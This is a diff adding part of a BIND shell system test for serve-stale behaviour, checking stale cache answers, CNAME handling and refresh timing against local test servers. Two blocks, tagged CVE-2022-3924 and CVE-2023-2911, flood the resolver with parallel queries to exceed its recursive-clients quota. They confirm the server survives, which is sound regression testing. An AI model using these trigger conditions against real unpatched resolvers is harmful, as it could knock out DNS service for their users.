+$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "prime cache data.example TXT (stale-answer-client-timeout) ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "prime cache nodata.example TXT (stale-answer-client-timeout) ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.3 nodata.example TXT > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "delay responses from authoritative server ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.2 txt slowdown > dig.out.test$n
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "prime cache data.slow TXT (stale-answer-client-timeout) ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.3 data.slow TXT > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "disable responses from authoritative server ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.2 txt disable > dig.out.test$n
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# Allow RRset to become stale.
+sleep 2
+
+nextpart ns3/named.run > /dev/null
+
+echo_i "sending queries for tests $((n+1))-$((n+3))..."
+t1=`$PERL -e 'print time()'`
+$DIG -p ${PORT} +tries=1 +timeout=10 @10.53.0.3 data.example TXT > dig.out.test$((n+1)) &
+$DIG -p ${PORT} +tries=1 +timeout=10 @10.53.0.3 nodata.example TXT > dig.out.test$((n+2))
+$DIG -p ${PORT} +tries=1 +timeout=10 @10.53.0.3 data.slow TXT > dig.out.test$((n+3)) &
+wait
+t2=`$PERL -e 'print time()'`
+
+# We configured a long value of 30 seconds for resolver-query-timeout.
+# That should give us enough time to receive an stale answer from cache
+# after stale-answer-client-timeout timer of 1.8 sec triggers.
+n=$((n+1))
+echo_i "check stale data.example TXT comes from cache (stale-answer-client-timeout 1.8) ($n)"
+ret=0
+wait_for_log 5 "data.example client timeout, stale answer used" ns3/named.run || ret=1
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "data\.example\..*3.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1
+# Configured stale-answer-client-timeout is 1.8s, we allow some extra time
+# just in case other tests are taking too much cpu.
+[ $((t2 - t1)) -le 10 ] || { echo_i "query took $((t2 - t1))s to resolve."; ret=1; }
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check stale nodata.example TXT comes from cache (stale-answer-client-timeout 1.8) ($n)"
+ret=0
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+grep "example\..*3.*IN.*SOA" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check stale data.slow TXT comes from cache (stale-answer-client-timeout 1.8) ($n)"
+ret=0
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "data\.slow\..*3.*IN.*TXT.*A slow text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# Now query for RRset not in cache. The first query should time out, but once
+# we enable the authoritative server, the second query should be able to get a
+# response.
+
+nextpart ns3/named.run > /dev/null
+
+echo_i "sending queries for tests $((n+2))-$((n+4))..."
+$DIG -p ${PORT} +tries=1 +timeout=3 @10.53.0.3 longttl.example TXT > dig.out.test$((n+2)) &
+$DIG -p ${PORT} +tries=1 +timeout=10 @10.53.0.3 longttl.example TXT > dig.out.test$((n+3)) &
+$DIG -p ${PORT} +tries=1 +timeout=3 @10.53.0.3 longttl.example RRSIG > dig.out.test$((n+4)) &
+
+# Enable the authoritative name server after stale-answer-client-timeout.
+n=$((n+1))
+echo_i "enable responses from authoritative server ($n)"
+ret=0
+sleep 4
+$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check not in cache longttl.example TXT times out (stale-answer-client-timeout 1.8) ($n)"
+ret=0
+wait_for_log 4 "longttl.example client timeout, stale answer unavailable" ns3/named.run || ret=1
+check_results() {
+ [ -s "$1" ] || return 1
+ grep "connection timed out" "$1" > /dev/null || return 1
+ return 0
+}
+retry_quiet 4 check_results dig.out.test$n || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check not in cache longttl.example TXT comes from authoritative (stale-answer-client-timeout 1.8) ($n)"
+ret=0
+check_results() {
+ [ -s "$1" ] || return 1
+ grep "status: NOERROR" "$1" > /dev/null || return 1
+ grep "ANSWER: 1," "$1" > /dev/null || return 1
+ return 0
+}
+retry_quiet 8 check_results dig.out.test$n || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check not in cache longttl.example RRSIG times out (stale-answer-client-timeout 1.8) ($n)"
+ret=0
+check_results() {
+ [ -s "$1" ] || return 1
+ grep "connection timed out" "$1" > /dev/null || return 1
+ return 0
+}
+retry_quiet 8 check_results dig.out.test$n || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# CVE-2022-3924, GL #3619
+n=$((n+1))
+echo_i "check that named survives reaching recursive-clients quota (stale-answer-client-timeout 1.8) ($n)"
+ret=0
+num=0
+# Make sure to exceed the configured value of 'recursive-clients 10;' by running
+# 20 parallel queries with simulated network latency.
+while [ $num -lt 20 ]; do
+ $DIG +tries=1 -p ${PORT} @10.53.0.3 "latency${num}.data.example" TXT >/dev/null 2>&1 &
+ num=$((num+1))
+done;
+check_server_responds() {
+ $DIG -p ${PORT} @10.53.0.3 version.bind txt ch >dig.out.test$n || return 1
+ grep "status: NOERROR" dig.out.test$n > /dev/null || return 1
+}
+retry_quiet 5 check_server_responds || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+#############################################
+# Test for stale-answer-client-timeout off. #
+#############################################
+echo_i "test stale-answer-client-timeout (off)"
+
+n=$((n+1))
+echo_i "updating ns3/named.conf ($n)"
+ret=0
+copy_setports ns3/named3.conf.in ns3/named.conf
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "running 'rndc reload' ($n)"
+ret=0
+rndc_reload ns3 10.53.0.3
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# Send a query, auth server is disabled, we will enable it after a while in
+# order to receive an answer before resolver-query-timeout expires. Since
+# stale-answer-client-timeout is disabled we must receive an answer from
+# authoritative server.
+echo_i "sending query for test $((n+2))"
+$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$((n+2)) &
+sleep 3
+
+n=$((n+1))
+echo_i "enable responses from authoritative server ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# Wait until dig is done.
+wait
+
+n=$((n+1))
+echo_i "check data.example TXT comes from authoritative server (stale-answer-client-timeout off) ($n)"
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "data\.example\..*[12].*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+##############################################################
+# Test for stale-answer-client-timeout off and CNAME record. #
+##############################################################
+echo_i "test stale-answer-client-timeout (0) and CNAME record"
+
+n=$((n+1))
+echo_i "prime cache shortttl.cname.example (stale-answer-client-timeout off) ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.3 shortttl.cname.example A > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 2," dig.out.test$n > /dev/null || ret=1
+grep "shortttl\.cname\.example\..*1.*IN.*CNAME.*longttl\.target\.example\." dig.out.test$n > /dev/null || ret=1
+grep "longttl\.target\.example\..*600.*IN.*A.*10\.53\.0\.2" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# Allow RRset to become stale.
+sleep 1
+
+n=$((n+1))
+echo_i "disable responses from authoritative server ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.2 txt disable > dig.out.test$n
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+ret=0
+echo_i "check stale shortttl.cname.example comes from cache (stale-answer-client-timeout off) ($n)"
+nextpart ns3/named.run > /dev/null
+$DIG -p ${PORT} @10.53.0.3 shortttl.cname.example A > dig.out.test$n
+wait_for_log 5 "shortttl.cname.example resolver failure, stale answer used" ns3/named.run || ret=1
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 2," dig.out.test$n > /dev/null || ret=1
+grep "shortttl\.cname\.example\..*3.*IN.*CNAME.*longttl\.target\.example\." dig.out.test$n > /dev/null || ret=1
+# We can't reliably test the TTL of the longttl.target.example A record.
+grep "longttl\.target\.example\..*IN.*A.*10\.53\.0\.2" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "enable responses from authoritative server ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check server is alive or restart ($n)"
+ret=0
+$RNDCCMD 10.53.0.3 status > rndc.out.test$n 2>&1 || ret=1
+if [ $ret != 0 ]; then
+ echo_i "failed"
+ echo_i "restart ns3"
+ start_server --noclean --restart --port ${PORT} serve-stale ns3
+fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check server is alive or restart ($n)"
+ret=0
+$RNDCCMD 10.53.0.3 status > rndc.out.test$n 2>&1 || ret=1
+if [ $ret != 0 ]; then
+ echo_i "failed"
+ echo_i "restart ns3"
+ start_server --noclean --restart --port ${PORT} serve-stale ns3
+fi
+status=$((status+ret))
+
+#############################################
+# Test for stale-answer-client-timeout 0. #
+#############################################
+echo_i "test stale-answer-client-timeout (0)"
+
+n=$((n+1))
+echo_i "updating ns3/named.conf ($n)"
+ret=0
+copy_setports ns3/named4.conf.in ns3/named.conf
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+echo_i "restart ns3"
+stop_server --use-rndc --port ${CONTROLPORT} ns3
+start_server --noclean --restart --port ${PORT} ns3
+
+n=$((n+1))
+echo_i "prime cache data.example TXT (stale-answer-client-timeout 0)"
+ret=0
+$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "prime cache nodata.example TXT (stale-answer-client-timeout 0)"
+ret=0
+$DIG -p ${PORT} @10.53.0.3 nodata.example TXT > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "disable responses from authoritative server ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.2 txt disable > dig.out.test$n
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# Allow RRset to become stale.
+sleep 2
+
+n=$((n+1))
+ret=0
+echo_i "check stale nodata.example TXT comes from cache (stale-answer-client-timeout 0) ($n)"
+nextpart ns3/named.run > /dev/null
+$DIG -p ${PORT} @10.53.0.3 nodata.example TXT > dig.out.test$n
+wait_for_log 5 "nodata.example stale answer used, an attempt to refresh the RRset" ns3/named.run || ret=1
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1
+grep "example\..*3.*IN.*SOA" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+ret=0
+echo_i "check stale data.example TXT comes from cache (stale-answer-client-timeout 0) ($n)"
+nextpart ns3/named.run > /dev/null
+$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n
+wait_for_log 5 "data.example stale answer used, an attempt to refresh the RRset" ns3/named.run || ret=1
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "data\.example\..*3.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "enable responses from authoritative server ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+wait_for_rrset_refresh() {
+ $DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n
+ grep "status: NOERROR" dig.out.test$n > /dev/null || return 1
+ grep "ANSWER: 1," dig.out.test$n > /dev/null || return 1
+ grep "data\.example\..*[12].*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || return 1
+}
+
+# This test ensures that after we get stale data due to
+# stale-answer-client-timeout 0, enabling the authoritative server will allow
+# the RRset to be updated.
+n=$((n+1))
+ret=0
+echo_i "check stale data.example TXT was refreshed (stale-answer-client-timeout 0) ($n)"
+retry_quiet 10 wait_for_rrset_refresh || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+wait_for_nodata_refresh() {
+ $DIG -p ${PORT} @10.53.0.3 nodata.example TXT > dig.out.test$n
+ grep "status: NOERROR" dig.out.test$n > /dev/null || return 1
+ grep "ANSWER: 0," dig.out.test$n > /dev/null || return 1
+ grep "example\..*[12].*IN.*SOA" dig.out.test$n > /dev/null || return 1
+ return 0
+}
+
+n=$((n+1))
+ret=0
+echo_i "check stale nodata.example TXT was refreshed (stale-answer-client-timeout 0) ($n)"
+retry_quiet 10 wait_for_nodata_refresh || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+####################################################################
+# Test for stale-answer-client-timeout 0 and recursive-clients 10. #
+# CVE-2023-2911, GL #4089 #
+# ##################################################################
+echo_i "test stale-answer-client-timeout (0) and recursive-clients 10"
+
+n=$((n+1))
+echo_i "prime cache data.slow TXT (stale-answer-client-timeout 0) ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.3 data.slow TXT > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# Run the following check twice. Sometimes a priming query interrupts the first
+# attempt to exceed the quota.
+attempt=0
+while [ $ret -eq 0 ] && [ $attempt -lt 2 ]; do
+ n=$((n+1))
+ echo_i "slow down response from authoritative server ($n)"
+ ret=0
+ $DIG -p ${PORT} @10.53.0.2 slowdown TXT > dig.out.test$n
+ grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+ grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1
+ if [ $ret != 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ # Let the data.slow TTL expire
+ sleep 2
+
+ n=$((n+1))
+ echo_i "check that named survives reaching recursive-clients quota (stale-answer-client-timeout 0) ($n)"
+ ret=0
+ num=0
+ # Attempt to exceed the configured value of 'recursive-clients 10;' by running
+ # 20 parallel queries for the stale domain which has slow auth.
+ while [ $num -lt 20 ]; do
+ $DIG +tries=1 +timeout=10 -p ${PORT} @10.53.0.3 data.slow TXT >/dev/null 2>&1 &
+ num=$((num+1))
+ done;
+ # Let the dig processes finish.
+ wait
+ retry_quiet 5 check_server_responds || ret=1
+ if [ $ret != 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ attempt=$((attempt+1))
+done
+
+# Restart ns3 to avoid the exceeded recursive-clients limit from previous check
+# to interfere with subsequent checks.
+echo_i "restart ns3"
+stop_server --use-rndc --port ${CONTROLPORT} ns3
+start_server --noclean --restart --port ${PORT} ns3
+
+############################################################
+# Test for stale-answer-client-timeout 0 and CNAME record. #
+############################################################
+echo_i "test stale-answer-client-timeout (0) and CNAME record"
+
+n=$((n+1))
+echo_i "prime cache cname1.stale.test A (stale-answer-client-timeout 0) ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.3 cname1.stale.test A > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 2," dig.out.test$n > /dev/null || ret=1
+grep "cname1\.stale\.test\..*1.*IN.*CNAME.*a1\.stale\.test\." dig.out.test$n > /dev/null || ret=1
+grep "a1\.stale\.test\..*1.*IN.*A.*192\.0\.2\.1" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# Allow RRset to become stale.
+sleep 1
+
+n=$((n+1))
+ret=0
+echo_i "check stale cname1.stale.test A comes from cache (stale-answer-client-timeout 0) ($n)"
+nextpart ns3/named.run > /dev/null
+$DIG -p ${PORT} @10.53.0.3 cname1.stale.test A > dig.out.test$n
+wait_for_log 5 "cname1.stale.test stale answer used, an attempt to refresh the RRset" ns3/named.run || ret=1
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 2," dig.out.test$n > /dev/null || ret=1
+grep "cname1\.stale\.test\..*3.*IN.*CNAME.*a1\.stale\.test\." dig.out.test$n > /dev/null || ret=1
+grep "a1\.stale\.test\..*3.*IN.*A.*192\.0\.2\.1" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check server is alive or restart ($n)"
+ret=0
+$RNDCCMD 10.53.0.3 status > rndc.out.test$n 2>&1 || ret=1
+if [ $ret != 0 ]; then
+ echo_i "failed"
+ echo_i "restart ns3"
+ start_server --noclean --restart --port ${PORT} ns3
+fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "prime cache cname2.stale.test A (stale-answer-client-timeout 0) ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.3 cname2.stale.test A > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 2," dig.out.test$n > /dev/null || ret=1
+grep "cname2\.stale\.test\..*1.*IN.*CNAME.*a2\.stale\.test\." dig.out.test$n > /dev/null || ret=1
+grep "a2\.stale\.test\..*300.*IN.*A.*192\.0\.2\.2" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# Allow CNAME record in the RRSET to become stale.
+sleep 1
+
+n=$((n+1))
+ret=0
+echo_i "check stale cname2.stale.test A comes from cache (stale-answer-client-timeout 0) ($n)"
+nextpart ns3/named.run > /dev/null
+$DIG -p ${PORT} @10.53.0.3 cname2.stale.test A > dig.out.test$n
+wait_for_log 5 "cname2.stale.test stale answer used, an attempt to refresh the RRset" ns3/named.run || ret=1
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 2," dig.out.test$n > /dev/null || ret=1
+grep "cname2\.stale\.test\..*3.*IN.*CNAME.*a2\.stale\.test\." dig.out.test$n > /dev/null || ret=1
+# We can't reliably test the TTL of the a2.stale.test A record.
+grep "a2\.stale\.test\..*IN.*A.*192\.0\.2\.2" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "check server is alive or restart ($n)"
+ret=0
+$RNDCCMD 10.53.0.3 status > rndc.out.test$n 2>&1 || ret=1
+if [ $ret != 0 ]; then
+ echo_i "failed"
+ echo_i "restart ns3"
+ start_server --noclean --restart --port ${PORT} ns3
+fi
+status=$((status+ret))
+
+####################################################################
+# Test for stale-answer-client-timeout 0 and stale-refresh-time 4. #
+####################################################################
+echo_i "test stale-answer-client-timeout (0) and stale-refresh-time (4)"
+
+n=$((n+1))
+echo_i "updating ns3/named.conf ($n)"
+ret=0
+copy_setports ns3/named5.conf.in ns3/named.conf
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "running 'rndc reload' ($n)"
+ret=0
+rndc_reload ns3 10.53.0.3
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "flush cache, enable responses from authoritative server ($n)"
+ret=0
+$RNDCCMD 10.53.0.3 flushtree example > rndc.out.test$n.1 2>&1 || ret=1
+$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "prime cache data.example TXT (stale-answer-client-timeout 0, stale-refresh-time 4) ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "data\.example\..*2.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# Allow RRset to become stale.
+sleep 2
+
+n=$((n+1))
+echo_i "disable responses from authoritative server ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.2 txt disable > dig.out.test$n
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+ret=0
+echo_i "check stale data.example TXT comes from cache (stale-answer-client-timeout 0 stale-refresh-time 4) ($n)"
+nextpart ns3/named.run > /dev/null
+$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n
+wait_for_log 5 "data.example stale answer used, an attempt to refresh the RRset" ns3/named.run || ret=1
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "data\.example\..*3.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "enable responses from authoritative server ($n)"
+ret=0
+$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n
+grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1
+grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# This test ensures that after we get stale data due to
+# stale-answer-client-timeout 0, enabling the authoritative server will allow
+# the RRset to be updated.
+n=$((n+1))
+ret=0
+echo_i "check stale data.example TXT was refreshed (stale-answer-client-timeout 0 stale-refresh-time 4) ($n)"
+retry_quiet 10 wait_for_rrset_refresh || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+# Allow RRset to become stale.
+sleep 2 + +n=$((n+1)) +echo_i "disable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt disable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +ret=0 +echo_i "check stale data.example TXT comes from cache (stale-answer-client-timeout 0 stale-refresh-time 4) ($n)" +nextpart ns3/named.run > /dev/null +$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n +wait_for_log 5 "data.example stale answer used, an attempt to refresh the RRset" ns3/named.run || ret=1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*3.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Allow stale-refresh-time to be activated. +n=$((n+1)) +ret=0 +echo_i "wait until resolver query times out, activating stale-refresh-time" +wait_for_log 15 "data.example resolver failure, stale answer used" ns3/named.run || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +ret=0 +echo_i "check stale data.example TXT comes from cache within stale-refresh-time (stale-answer-client-timeout 0 stale-refresh-time 4) ($n)" +nextpart ns3/named.run > /dev/null +$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n +wait_for_log 5 "data.example query within stale refresh time" ns3/named.run || ret=1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*3.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "enable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt 
enable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# We give BIND some time to ensure that after we enable authoritative server, +# this RRset is still not refreshed because it was hit during +# stale-refresh-time window. +sleep 1 + +n=$((n+1)) +ret=0 +echo_i "check stale data.example TXT was not refreshed (stale-answer-client-timeout 0 stale-refresh-time 4) ($n)" +nextpart ns3/named.run > /dev/null +$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n +wait_for_log 5 "data.example query within stale refresh time" ns3/named.run || ret=1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*3.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# After the refresh-time-window, the RRset will be refreshed. 
